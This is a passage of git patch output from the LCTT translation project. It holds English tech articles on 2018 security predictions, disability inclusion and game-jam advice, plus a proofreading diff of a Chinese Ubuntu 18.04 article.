Gap + +"The security skills gap is widening every year, with no signs of slowing down. To combat the skills gap and assist in the growing adoption of advanced analytics, automation will become an even higher priority for CISOs." -Haiyan Song, senior vice president of Security Markets at Splunk + + +### Industrial Security Gets Overdue Attention + +"The high-profile attacks of 2017 acted as a wake-up call, and many plant managers now worry that they could be next. Plant manufacturers themselves will offer enhanced security. Third-party companies going on their own will stay in a niche market. The industrial security manufacturers themselves will drive a cooperation with the security industry to provide security themselves. This is because there is an awareness thing going on and impending government scrutiny. This is different from what happened in the rest of IT/IoT where security vendors just go to market by themselves as a layer on top of IT (i.e.: an antivirus on top of Windows)." -Renaud Deraison, co-founder and CTO, Tenable + + +### Cryptocurrencies Become the New Playground for Identity Thieves + +"The rising value of cryptocurrencies will lead to greater attention from hackers and bad actors. Next year we'll see more fraud, hacks and money laundering take place across the top cryptocurrency marketplaces. This will lead to a greater focus on identity verification and, ultimately, will result in legislation focused on trader identity." -Stephen Maloney, executive vice president of Business Development & Strategy, Acuant + + +### GDPR Compliance Will Be a Challenge + +"In 2018, three quarters of companies or apps will be ruled out of compliance with GDPR and at least one major corporation will be fined to the highest extent in 2018 to set an example for others. Most companies are preparing internally by performing more security assessments and recruiting a mix of security professionals with privacy expertise and lawyers, but with the deadline quickly approaching, it's clear the bulk of businesses are woefully behind and may not be able to avoid these consequences." -Sanjay Beri, founder and CEO, Netskope + + +### Data Security Solidifies Its Spot in the IT Security Stack + +"Many businesses are stuck in the mindset that security of networks, servers and applications is sufficient to protect their data. However, the barrage of breaches in 2017 highlights a clear disconnect between what organizations think is working and what actually works. In 2018, we expect more businesses to implement data security solutions that complement their existing network security deployments." -Jim Varner, CEO of SecurityFirst + + +### [Eight Cyber-Security Vendors Raise New Funding in November 2017][1] + +Though the pace of funding slowed in November, multiple firms raised new venture capital to develop and improve their cyber-security products. + +Though the pace of funding slowed in November, multiple firms raised new venture capital to develop and improve their cyber-security products. + +-------------------------------------------------------------------------------- + +via: http://voip.eweek.com/security/18-cyber-security-trends-organizations-need-to-brace-for-in-2018 + +作者:[Sean Michael Kerner][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://voip.eweek.com/Authors/sean-michael-kerner +[1]:http://voip.eweek.com/security/eight-cyber-security-vendors-raise-new-funding-in-november-2017 From 4fa1d5f5792399866ff7eb13c3cbfd1809c36e5d Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 17:26:08 +0800 Subject: [PATCH 0815/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Why=20the=20div?= =?UTF-8?q?ersity=20and=20inclusion=20conversation=20must=20include=20peop?= =?UTF-8?q?le=20with=20disabilities?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...n must include people with disabilities.md | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 sources/tech/20171222 Why the diversity and inclusion conversation must include people with disabilities.md diff --git a/sources/tech/20171222 Why the diversity and inclusion conversation must include people with disabilities.md b/sources/tech/20171222 Why the diversity and inclusion conversation must include people with disabilities.md new file mode 100644 index 0000000000..8052b91dc4 --- /dev/null +++ b/sources/tech/20171222 Why the diversity and inclusion conversation must include people with disabilities.md @@ -0,0 +1,67 @@ +Why the diversity and inclusion conversation must include people with disabilities +====== +![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_community_1.png?itok=rT7EdN2m) +"Diversity is being invited to the party, inclusion is being asked to dance." -Verna Myers + +With this in mind, communities should invite as many individuals as possible to dance the night away. Diversity and inclusion get a lot of attention in the tech community these days, perhaps more than in any other industry. Many experts agree that when people of different backgrounds work together to find solutions to problems, the result is a broader scope of innovation and better outcomes. + +Many organizations, including open source projects, publish reports on diversity to ensure that everybody understands its importance and participates in efforts to support it. But often diversity initiatives are limited to gender (specifically, bringing women into technology fields) and ethnicity. + +Gender and ethnic/racial equality in the tech community are both important, and I certainly don't want to downplay these issues. But limiting diversity efforts to gender and race excludes many other worthy groups. One of these is people with disabilities. + +According to many sources, at least 15% to 20% of people in the U.S. alone struggle with some type of disability. About 70% of these are disabilities such as blindness, cognitive challenges, or chronic disease, which are not visible from the outside. This group includes many talented individuals who can bring unique and valuable experiences and insights to projects and workplaces. + +Oscar-winning actress and activist Marlee Matlin said, "Diversity is a beautiful, absolutely wonderful thing, but I don't think they consider people with disabilities, and deaf and hard-of-hearing people, as part of the diversity mandate." + +Inclusion means everybody, not just specific groups. When diversity efforts focus only on specific groups, many others are excluded. And often, the loudest group wins attention at the expense of others. + +Open source communities are particularly well-positioned for workforce inclusion, because technology can help level the playing field for people with disabilities. But the community must be willing to do so. + +Here are ways organizations can become more inclusive of people with disabilities. + +### Making conferences more accessible + +Scheduling a conference at an ADA-certified building doesn't necessarily mean the conference is accessible to all those with disabilities. + +Providing step-free access from streets and parking lots and wheelchair-accessible restrooms is a good start. But what about the presenter's stage? + +Accessibility to events should consider both presenters and attendees. Many conferences have likely missed out on a great deal of valuable insight from disabled speakers who were unable or unwilling to participate based on previous negative experiences. + +It's also important to scatter reserved seats and areas that can accommodate mobile devices and service dogs throughout the venue so all attendees can be seated with their friends and colleagues (a big shout-out to the fine folks at AlterConf for understanding this). + +Visual impairment doesn't need to preclude people from attending conferences if efforts are made to accommodate them. Visual impairment doesn't always mean total blindness. According to a 2014 World Health Organization report, 285 million people worldwide suffer from some form of visual impairment; about 14% of this group is legally blind, while the rest have low or impaired vision. + +Finding the way to sessions can be a challenge for visually impaired individuals, and an open and welcoming community can address this. For starters, be sure to make accommodations for guide dogs, and don't distract them while they're working. + +Communities could also implement a "buddy system" in which a sighted person teams up with a visually impaired person to help guide them at sessions that both individuals plan to attend. Attendees could find a match using IRC, Slack, Forum, or some other tool and meet at a designated location. This would be a win-win from a community standpoint: Not only would the visually impaired attendee get to the session more easily, but both would have an opportunity to connect over a topic they share an interest in. And isn't that sort of connection the very definition of community? + +Preferred seating can be provided to ensure that attendees with limited vision are located as close as possible to the stage. This would also benefit people with physical disabilities who rely on assistive devices like canes (yours truly), wheelchairs, or walkers. + +If you are a speaker who is sharing your insight with the community, you deserve respect and credit--it is not always easy for people to stand onstage and address a large audience. However, if you use slides and graphics to enhance your presentation, and if these images show key data points, the words "as you can see on this slide" should be eradicated from your talk. This is considerate not only of people with visual impairments, but also anyone who might be listening to your talk while driving, for example. + +Another group to consider are people with hearing impairments, or [D/deaf people][1]. Enabling them to participate presents a technical challenge I would love to see addressed as an open source solution. Live speech-text-transcription would be beneficial in many scenarios. How many people reading this use the closed-captions on TVs in sports bars or at the gym? + +Providing sign language translators is great, of course, but this can present a challenge at international conferences because sign language, like any other language, is regional. While ASL (American Sign Language) is used in the U.S. and English-speaking Canada, there are also dialects, as in other languages. Speech-to-text may be a more realistic option, and accommodations for CART (Communication Access Realtime Translation) would benefit many, including non-English speakers. + +### Making content more accessible + +Sometimes you are simply unable to physically attend a particular conference due to conflicts, distance, or other factors. Or perhaps you did attend but want to catch up on sessions you were unable to fit in. Not a problem, thanks to YouTube and other sites, right? What if you're D/deaf, and the videos online don't include captions? (Please don't rely on YouTube captions; the hashtag #youtubecraptions was created for a reason.) + +Fortunately, you can provide your own recordings. Be sure to format event content, including any posted slides, so that visually impaired users can use an open source screen reader like NVDA on Windows, or Orca on Linux, to navigate both the site and the slides. Correct formatting is key so that screen readers can follow the flow of the document in the right order. Please include ALT IMG tags for pictures to describe what the image shows. + +### Conclusion + +Perhaps the first step toward creating a more inclusive community is to acknowledge that it involves a much wider group of individuals than is typically discussed. Communities have a lot of work to do, and particularly for small teams, this can present an extra challenge. The most important part is to take note of the problems and address them whenever possible. Even small efforts can go a long way--and for that I offer my heartfelt thanks. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/diversity-and-inclusion + +作者:[Michael Schulz][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/mschulz +[1]:https://en.wikipedia.org/wiki/Deaf_culture From 86d48a54d24147f0433caf3580b514d7d6a2f080 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 17:28:57 +0800 Subject: [PATCH 0816/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20keys=20to?= =?UTF-8?q?=20quick=20game=20development?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...71222 10 keys to quick game development.md | 99 +++++++++++++++++++ 1 file changed, 99 insertions(+) create mode 100644 sources/tech/20171222 10 keys to quick game development.md diff --git a/sources/tech/20171222 10 keys to quick game development.md b/sources/tech/20171222 10 keys to quick game development.md new file mode 100644 index 0000000000..e65ad11812 --- /dev/null +++ b/sources/tech/20171222 10 keys to quick game development.md @@ -0,0 +1,99 @@ +10 keys to quick game development +====== +![配图](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_code_woman.png?itok=vbYz6jjb) + +In early October, the inaugural [Open Jam][1] sponsored by Opensource.com drew 45 entries from teams located around the world. The teams had just three days to create a game using open source software to enter into the competition, and [three teams came out on top][2]. + +We hosted our own Open Jam event at our university for anyone who wanted to participate. We reserved a computer lab for the weekend and taught people how to use open source software--[Godot][3] for the game engine, [LMMS][4] for music creation, [GIMP][5] for 2D art, and [Blender][6] for 3D art--to create games and game art assets. Three games were submitted from our event: [Loathsome][7], [Lost Artist][8], and [Paint Rider][9] (which I created). + +From my experience with game jams and game development in general, here are 10 lessons I've learned about game engines, coding, and rapid game development. + +## 1\. Narrow your scope + +It's easy to get carried away with ideas to make an expansive adventure game or something that compares to your favorite game. Pursuing that outside of a game jam can be awesome, once you have some experience, but don't overestimate what you have time for. What I love about game jams is they force you to focus on getting a game from the conceptual stage to a final product quickly, since you have such a limited amount of time. This is why narrowing your scope is so important. + +The theme for Open Jam was "Leave a Mark." As soon as it was announced, my friends and I started brainstorming games that could fit that theme. One idea was a 3D boxing game where the player left bruises on their enemy. I had very little experience making 3D games and, while I would have loved to get better at them, I probably would have spent too much time learning how to get all the textures situated and hit boxes working before I could even start to figure out what would make a fun game. + +## 2\. Have something playable very early + +This is my favorite advice for game jams. Try to come up with the core mechanics and code them to a working state quickly so you can test them and decide whether it's worthy of making a full game. You shouldn't be hours away from the deadline and still trying to get your game playable. For a three-day jam like Open Jam, it shouldn't take more than a few hours to have some sort of demo running. + +## 3\. Keep it simple + +Every feature that you want to include extends your total development time. You never know if committing to a feature will lead to a major time sink because you just can't quite get it to work. Arcade-style high-score games typically work well for game jams because they're usually simple by nature. Once you've finished the core, you can start adding features and polish without having to worry whether you'll have a functioning game in the end. + +## 4\. Take inspiration from other games + +You may be tempted to create something totally original, but having models to base your work on is extremely helpful. It will decrease the time it takes to come up with the mechanics, since you'll already have an idea of what is fun. Remind yourself that the more experience you have under your belt, the easier it is to create that massive game you have so many ideas for, so you might as well practice by trying to recreate things other people have done. + +Considering Open Jam's "Leave a Mark" theme, I thought it would be fun to create a game where you leave a trail of paint as you played, so you could see the mark you left. I remembered the old Flash game [Line Rider 2 Beta][10] (hence the name Paint Rider), and about the secret feature where you could draw a track if you held the Control button down while you played. I simplified that concept even more by requiring only one button for vertical movement (much like old helicopter games). About an hour or two into the jam, I had a basic demo where you could move up or down with one button and leave a trail of little black circles. + +## 5\. Don't overlook accessibility + +Make sure as many people as possible can play your game. One of the games submitted to Open Jam was a virtual-reality game. As cool as that was, hardly anyone was able to play it, because not many people have a VR device. Luckily, its developer didn't expect it would do well in the ratings, and instead considered it practice. But, if you want to share your game with lots of people (or win game jams), it's important to pay attention to accessibility. + +Godot (and most other game engines) allow you to export your game to all major platforms. When submitting a game specifically to [Itch.io][11], having an in-browser version will allow most people to play it. But always look into exporting to as many platforms and operating systems as you can. I even tried exporting Paint Rider to mobile, but technical difficulties got in the way. + +## 6\. Don't make it too difficult + +If your game takes too much effort to learn or play, you'll lose a portion of your audience. This aligns nicely with keeping your game simple and within scope, and it puts even more importance on the game planning phase. Again, it's easy to come up with an epic game idea you could spend weeks or months developing; it's harder to come up with a good, simple game. + +I showed Paint Rider to my Mom and she was able to play it immediately. I don't think I need to say anything more about that. + +## 7\. Don't be too neat + +If you're used to taking your time applying design patterns everywhere and making sure that your code will be reusable and readable, try to loosen up a bit. If you spend too much time worrying about design, when you finally get to the point when you can play your game, you may find out it's not very fun. By then, it's too late to make changes. + +This process is also used for prototyping more serious games: You quickly code up messy proof-of-concept demos until you find one that's worth making into a full game, then you dive into building a perfect code base to support it. Creating a game for a game jam is like quickly coding up a proof of concept. + +## 8\. But don't be too messy, either + +On the other hand, [spaghetti code][12] can easily get out of control, even if there's not a ton of code in a game. Luckily, most game engines are built with design patterns in mind. Take Godot's [Signals][13] functionality, which allows nodes to send messages with data to nodes they've been "connected" with--it's the [observer pattern][14] automatically baked into your design. As long as you know how to take advantage of the game engine's features, you should be able to code quickly without making your code too painful to look at. + +## 9\. Get feedback + +Show people what you're working on. Have them try it out and see what they say about it. Watch how they play your game and see if they find something you didn't expect. If the game jam has a [Discord][15] channel or something similar, post your game there, or bounce your ideas off people. One of Paint Rider's defining features is that the canvas loops, so you see the paint you left before. I hadn't even considered that mechanic until someone asked me why the game didn't have it. + +Working on a team will ensure that there are other people built into the process who can pass feedback around. + +And don't forget to help other people out in the same way; it's a win-win if you realize something that could help your game while you're playing someone else's game. + +## 10\. Know where to find resources + +Creating all your own assets can really slow you down. During Open Jam, I noticed that Loathsome's developer was spending multiple hours drawing the main character while I was busy incorporating new features and fixing bugs. You could simplify your art style for the game and still come up with something that looks and sounds good, but there are other options. Try looking for assets in [Creative Commons][16] or on free music sites like [Anttis Instrumentals][17]. Or, if possible, form a team with a dedicated artist, writer, or musician. + +Other software you might find useful includes [Krita][18], an open source 2D image creator that's nice for digital painting, especially if you have a drawing tablet, and [sfxr][19], a game sound-effect creator that has a lot of parameters to play with, but as its creator says: "Basic usage involves hitting the randomize button." (All sound effects in Paint Rider were made with Sfxr.) You can also check out [Calinou][20]'s large and neatly organized list of open source game development software. + +Have you participated in Open Jam or another a game jam and have other advice? Or do you have questions I didn't address? If so, please share them in the comments. + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/12/10-keys-rapid-open-source-game-development + +作者:[Ryan Estes][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/figytuna +[1]:https://itch.io/jam/open-jam-1 +[2]:https://opensource.com/article/17/11/open-jam +[3]:https://godotengine.org/ +[4]:https://lmms.io/ +[5]:https://www.gimp.org/ +[6]:https://www.blender.org/ +[7]:https://astropippin.itch.io/loathsome +[8]:https://masonraus.itch.io/lost-artist +[9]:https://figytuna.itch.io/paint-rider +[10]:http://www.andkon.com/arcade/racing/lineriderbeta2/ +[11]:https://itch.io/ +[12]:https://en.wikipedia.org/wiki/Spaghetti_code +[13]:http://kidscancode.org/blog/2017/03/godot_101_07/ +[14]:https://en.wikipedia.org/wiki/Observer_pattern +[15]:https://discordapp.com/ +[16]:https://creativecommons.org/ +[17]:http://www.soundclick.com/bands/default.cfm?bandID=1277008 +[18]:https://krita.org/en/ +[19]:http://www.drpetter.se/project_sfxr.html +[20]:https://notabug.org/Calinou/awesome-gamedev/src/master/README.md From 8d7d65d4fa87193eac6bd67de48d4c389b9c1ec7 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 27 Dec 2017 17:40:53 +0800 Subject: [PATCH 0817/1627] =?UTF-8?q?PRF&PUB:20171205=20Ubuntu=2018.04=20?= =?UTF-8?q?=E2=80=93=20New=20Features.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @kimii --- .../20171205 Ubuntu 18.04 – New Features.md | 78 ++++++++----------- 1 file changed, 32 insertions(+), 46 deletions(-) rename {translated/tech => published}/20171205 Ubuntu 18.04 – New Features.md (60%) diff --git a/translated/tech/20171205 Ubuntu 18.04 – New Features.md b/published/20171205 Ubuntu 18.04 – New Features.md similarity index 60% rename from translated/tech/20171205 Ubuntu 18.04 – New Features.md rename to published/20171205 Ubuntu 18.04 – New Features.md index 7c91177850..8422959446 100644 --- a/translated/tech/20171205 Ubuntu 18.04 – New Features.md +++ b/published/20171205 Ubuntu 18.04 – New Features.md @@ -1,8 +1,7 @@ -Ubuntu 18.04 – 新功能,发行日期和更多信息 +Ubuntu 18.04 新功能、发行日期和更多信息 ============================================================ - -我们一直都在翘首以盼 - 新的 Ubuntu 的 LTS 版本 - 18.04。了解有关新功能,发行日期以及更多信息。 +我们一直都在翘首以盼 —— 新的 Ubuntu 的 LTS 版本 —— 18.04。了解有关新功能,发行日期以及更多信息。 > 提示:我们将经常在这篇文章中更新新的信息,所以请为此页面添加书签,然后再回来查看。 @@ -10,9 +9,8 @@ Ubuntu 18.04 – 新功能,发行日期和更多信息 让我们以一些基本信息开始。 -* 这是一个新的 LTS(Long Term Support)版本。所以你得到了对桌面版和服务器版 5 年的支持。 - -* 被命名为“Bionic Beaver”(仿生狐狸)。Canonical 的创始人 Mark Shuttleworth 解释了这个名字背后的含义。吉祥物是一个海狸,因为它充满活力,勤劳,并且是一个很棒工程师 - 这完美地描述了一个典型的 Ubuntu 用户,以及新的 Ubuntu 发行版本身。使用“Bionic”(仿生)这个形容词是由于在 Ubuntu Core 上运行的机器人数量的增加。 +* 这是一个新的 LTS(长期支持)版本。所以对桌面版和服务器版有 5 年的支持。 +* 被命名为 “Bionic Beaver”(仿生河狸)。Canonical 的创始人 Mark Shuttleworth 解释了这个名字背后的含义。吉祥物是一个河狸,因为它充满活力,勤劳,并且是一个很棒工程师 —— 这完美地描述了一个典型的 Ubuntu 用户,以及新的 Ubuntu 发行版本身。使用 “Bionic”(仿生)这个形容词是由于在 Ubuntu Core 上运行的机器人数量的增加。 ### Ubuntu 18.04 发行日期和日程 @@ -21,48 +19,39 @@ Ubuntu 18.04 – 新功能,发行日期和更多信息 对进一步的细节,这里是有关 Ubuntu 18.04 LTS 的重要日期和需要知道的: * 2017 年 11 月 30 日 - 功能定义冻结。 - * 2018 年 1 月 4 日 - 第一个 Alpha 版本。所以,如果您选择接收新的 Alpha 版本,那么您将在这天获得 Alpha 1 更新。 - * 2018 年 2 月 1 日 - 第二个 Alpha 版本。 - * 2018 年 3 月 1 日 - 功能冻结。将不会引入或发布新功能。所以开发团队只会在改进现有功能和修复错误上努力。当然也有例外。如果您不是开发人员或有经验的用户,但仍想尝试新的 Ubuntu ASAP,那么我个人建议从此版本开始。 - -* 2018 年 3 月 8 日 - 第一次 Bata 版本。如果您选择接收 Bata 版更新,则会在当天得到更新。 - -* 2018 年 3 月 22 日 - 用户界面冻结。这意味着不会对实际的用户界面做进一步的更改或更新,因此,如果您编写文档,[教程][1],并使用屏幕截图,那时启动是安全的。 - +* 2018 年 3 月 8 日 - 第一个 Bata 版本。如果您选择接收 Bata 版更新,则会在当天得到更新。 +* 2018 年 3 月 22 日 - 用户界面冻结。这意味着不会对实际的用户界面做进一步的更改或更新,因此,如果您编写文档,[教程][1],并使用屏幕截图,那时开始是可靠的。 * 2018 年 3 月 29 日 - 文档字符串冻结。将不会有任何编辑或新的东西(字符串)添加到文档中,所以翻译者可以开始翻译文档。 - * 2018 年 4 月 5 日 - 最终 Beta 版本。这也是开始使用新版本的好日子。 - * 2018 年 4 月 19 日 - 最终冻结。现在一切都已经完成了。版本的图像被创建和分发,并且可能不会有任何更改。 - -* 2018 年 4 月 26 日 - 官方最终版本的 Ubuntu 18.04。每个人都应该从今天开始使用它,即使在生产服务器上。我们建议从[Vultr][2]获得 Ubuntu 18.04 服务器并测试新功能。[Vultr][3]的服务器每月起价为 2.5 美元。 +* 2018 年 4 月 26 日 - 官方最终版本的 Ubuntu 18.04。每个人都可以从这一天开始使用它,即使在生产服务器上。我们建议从 [Vultr][2] 获得 Ubuntu 18.04 服务器并测试新功能。[Vultr][3] 的服务器每月起价为 2.5 美元。(LCTT 译注:这是原文广告!) ### Ubuntu 18.04 的新功能 在 Ubuntu 18.04 LTS 上的所有新功能: -### 彩色表情符号现已支持 +#### 现已支持彩色表情符号 -在以前的版本中,Ubuntu 只支持单色(黑和白)表情符号,坦白地说,它看起来不是太好。Ubuntu 18.04 将使用[Noto Color Emoji font][7]来支持彩色表情符号。随着 18.04,你可以在任何地方轻松查看和添加颜色表情符号。他们是本地支持的 - 所以你可以使用它们,而不使用第三方应用程序或安装/配置任何额外的东西。你可以随时通过删除字体来禁用彩色表情符号。 +在以前的版本中,Ubuntu 只支持单色(黑和白)表情符号,坦白地说,它看起来不是太好。Ubuntu 18.04 将使用[Noto Color Emoji font][7] 来支持彩色表情符号。随着 18.04,你可以在任何地方轻松查看和添加颜色表情符号。它们是原生支持的 —— 所以你可以使用它们,而不用使用第三方应用程序或安装/配置任何额外的东西。你可以随时通过删除该字体来禁用彩色表情符号。 -### GNOME 桌面环境 +#### GNOME 桌面环境 - [![ubuntu 17.10 gnome](https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg.webp)][8] +[![ubuntu 17.10 gnome](https://thishosting.rocks/wp-content/uploads/2017/12/ubuntu-17-10-gnome.jpg.webp)][8] -Ubuntu 从 Ubuntu 17.10 开始使用的 GNOME 桌面环境,而不是默认的 Unity 环境。Ubuntu 18.04 将继续使用 GNOME。这是 Ubuntu 的一个重要的变化。 +Ubuntu 从 Ubuntu 17.10 开始使用 GNOME 桌面环境,而不是默认的 Unity 环境。Ubuntu 18.04 将继续使用 GNOME。这是 Ubuntu 的一个重要的变化。 -### Ubuntu 18.04 桌面将有一个新的默认主题 +#### Ubuntu 18.04 桌面将有一个新的默认主题 Ubuntu 18.04 正在用新的 GTK 主题以告别旧的默认主题 “Ambience”。如果你想帮助新的主题,看看一些截图甚至更多,去[这里][9]。 到目前为止,有人猜测 Suru 将成 为 Ubuntu 18.04 的[新默认图标主题][10]。这里有一个截图: - [![suru icon theme ubuntu 18.04](https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg.webp)][11] +[![suru icon theme ubuntu 18.04](https://thishosting.rocks/wp-content/uploads/2017/12/suru-icon-theme-ubuntu-18-04.jpg.webp)][11] -> 值得注意的是:Ubuntu 16.10,17.04 和 17.10 中的所有新功能都将滚动到 Ubuntu 18.04 中。所以更新像右边的窗口按钮,更好的登录屏幕,改进的蓝牙支持等将推出到Ubuntu 18.04。我们不会包含一个特殊的部分,因为它对 Ubuntu 18.04 本身并不新鲜。如果您想了解更多关于从 16.04 到 18.04 的所有变化,请谷歌搜索它们之间的每个版本。 +> 值得注意的是:Ubuntu 16.10,17.04 和 17.10 中的所有新功能都将滚动到 Ubuntu 18.04 中,这些更新,如右边的窗口按钮、更好的登录屏幕,改进的蓝牙支持等将推送到 Ubuntu 18.04。对此我们不会特别说明,因为它对 Ubuntu 18.04 本身并不新鲜。如果您想了解更多关于从 16.04 到 18.04 的所有变化,请谷歌搜索它们之间的每个版本。 ### 下载 Ubuntu 18.04 @@ -78,49 +67,46 @@ Ubuntu 18.04 正在用新的 GTK 主题以告别旧的默认主题 “Ambience 现在是一些经常被问到的问题(附带答案),这应该能给你关于这一切的更多信息。 -### 什么时候切换到 Ubuntu 18.04 是安全的? +#### 什么时候切换到 Ubuntu 18.04 是安全的? 当然是在正式的最终发布日期。但是,如果您等不及,请开始使用 2018 年 3 月 1 日的桌面版本,并在 2018 年 4 月 5 日开始测试服务器版本。但是为了确保安全,您需要等待最终发布,甚至更长时间,使得您正在使用的第三方服务和应用程序经过测试,并在新版本上进行良好运行。 -### 如何将我的服务器升级到 Ubuntu 18.04? +#### 如何将我的服务器升级到 Ubuntu 18.04? -这个过程相当简单,但潜在风险很大。我们可能会在不久的将来发布一个教程,但你基本上需要使用‘do-release-upgrade’。同样,升级你的服务器也有潜在的风险,并且如果在生产服务器上,我会在升级之前再三考虑。特别是如果你在 16.04 上剩有几年的支持。 +这个过程相当简单,但潜在风险很大。我们可能会在不久的将来发布一个教程,但你基本上需要使用 `do-release-upgrade`。同样,升级你的服务器也有潜在的风险,并且如果在生产服务器上,我会在升级之前再三考虑。特别是如果你在 16.04 上还剩有几年的支持。 -### 我怎样才能帮助 Ubuntu 18.04? +#### 我怎样才能帮助 Ubuntu 18.04? 即使您不是一个经验丰富的开发人员和 Ubuntu 用户,您仍然可以通过以下方式提供帮助: -* 宣传它。让人们了解Ubuntu 18.04。在社交媒体上的一个简单的分享也有点帮助。 - +* 宣传它。让人们了解 Ubuntu 18.04。在社交媒体上的一个简单的分享也有点帮助。 * 使用和测试版本。开始使用该版本并进行测试。同样,您不必是一个开发人员。您仍然可以查找和报告错误,或发送反馈。 - * 翻译。加入翻译团队,开始翻译文档或应用程序。 - * 帮助别人。加入一些在线 Ubuntu 社区,并帮助其他人解决他们对 Ubuntu 18.04 的问题。有时候人们需要帮助,一些简单的事如“我在哪里可以下载 Ubuntu?” -### Ubuntu 18.04 对其他发行版如 Lubuntu 意味着什么? +#### Ubuntu 18.04 对其他发行版如 Lubuntu 意味着什么? 所有基于 Ubuntu 的发行版都将具有相似的新功能和类似的发行计划。你需要检查你的发行版的官方网站来获取更多信息。 -### Ubuntu 18.04 是一个 LTS 版本吗? +#### Ubuntu 18.04 是一个 LTS 版本吗? -是的,Ubuntu 18.04 是一个 LTS(Long Term Support)版本,所以你将得到 5 年的支持。 +是的,Ubuntu 18.04 是一个 LTS(长期支持)版本,所以你将得到 5 年的支持。 -### 我能从 Windows/OS X 切换到 Ubuntu 18.04 吗? +#### 我能从 Windows/OS X 切换到 Ubuntu 18.04 吗? 当然可以!你很可能也会体验到性能的提升。从不同的操作系统切换到 Ubuntu 相当简单,有相当多的相关教程。你甚至可以设置一个双引导,来使用多个操作系统,所以 Windows 和 Ubuntu 18.04 你都可以使用。 -### 我可以尝试 Ubuntu 18.04 而不安装它吗? +#### 我可以尝试 Ubuntu 18.04 而不安装它吗? -当然。你可以使用像[VirtualBox][14]这样的东西来创建一个“虚拟桌面” - 你可以在你的本地机器上安装它,并且使用 Ubuntu 18.04 而不需要真正地安装 Ubuntu。 +当然。你可以使用像 [VirtualBox][14] 这样的东西来创建一个“虚拟桌面” —— 你可以在你的本地机器上安装它,并且使用 Ubuntu 18.04 而不需要真正地安装 Ubuntu。 -或者你可以在[Vultr][15]上以每月 2.5 美元的价格尝试 Ubuntu 18.04 服务器。如果你使用一些[免费账户(free credits)][16],那么它本质上是免费的。 +或者你可以在 [Vultr][15] 上以每月 2.5 美元的价格尝试 Ubuntu 18.04 服务器。如果你使用一些[免费账户(free credits)][16],那么它本质上是免费的。(LCTT 译注:广告!) -### 为什么我找不到 Ubuntu 18.04 的 32 位版本? +#### 为什么我找不到 Ubuntu 18.04 的 32 位版本? -因为没有 32 位版本。Ubuntu的 17.10 版本放弃了 32 位版本。如果你使用的是旧硬件,那么最好使用不同的[轻量级Linux发行版][17]而不是 Ubuntu 18.04。 +因为没有 32 位版本。Ubuntu 的 17.10 版本便放弃了 32 位版本。如果你使用的是旧硬件,那么最好使用不同的[轻量级 Linux 发行版][17]而不是 Ubuntu 18.04。 -### 还有其他问题吗? +#### 还有其他问题吗? 在下面留言!分享您的想法,我们会非常激动,并且一旦有新信息发布,我们就会更新这篇文章。敬请期待,耐心等待! @@ -128,9 +114,9 @@ Ubuntu 18.04 正在用新的 GTK 主题以告别旧的默认主题 “Ambience via: https://thishosting.rocks/ubuntu-18-04-new-features-release-date/ -作者:[ thishosting.rocks][a] +作者:[thishosting.rocks][a] 译者:[kimii](https://github.com/kimii) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From b725de398b3108fcc2ba579eac18df58d3c042e5 Mon Sep 17 00:00:00 2001 From: darksun Date: Wed, 27 Dec 2017 18:02:58 +0800 Subject: [PATCH 0818/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20My=20personal?= =?UTF-8?q?=20Email=20setup=20-=20Notmuch,=20mbsync,=20postfix=20and=20dov?= =?UTF-8?q?ecot?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... - Notmuch, mbsync, postfix and dovecot.md | 235 ++++++++++++++++++ 1 file changed, 235 insertions(+) create mode 100644 sources/tech/20171223 My personal Email setup - Notmuch, mbsync, postfix and dovecot.md diff --git a/sources/tech/20171223 My personal Email setup - Notmuch, mbsync, postfix and dovecot.md b/sources/tech/20171223 My personal Email setup - Notmuch, mbsync, postfix and dovecot.md new file mode 100644 index 0000000000..2eabd299d7 --- /dev/null +++ b/sources/tech/20171223 My personal Email setup - Notmuch, mbsync, postfix and dovecot.md @@ -0,0 +1,235 @@ +My personal Email setup - Notmuch, mbsync, postfix and dovecot +====== +I've been using personal email setup for quite long and have not documented it anywhere. Recently when I changed my laptop (a post is pending about it) I got lost trying to recreate my local mail setup. So this post is a self documentation so that I don't have to struggle again to get it right. + +### Server Side + +I run my own mail server and I use postfix as SMTP server and Dovecot for the IMAP purpose. I'm not going into detail of setting those up as my setup was mostly done by using scripts created by Jonas for Redpill infrastructure. What redpill is?. (In jonas's own words) + +> Redpill is a concept - a way to setup Debian hosts to collaborate across organisations I develop the concept, and use it for the first 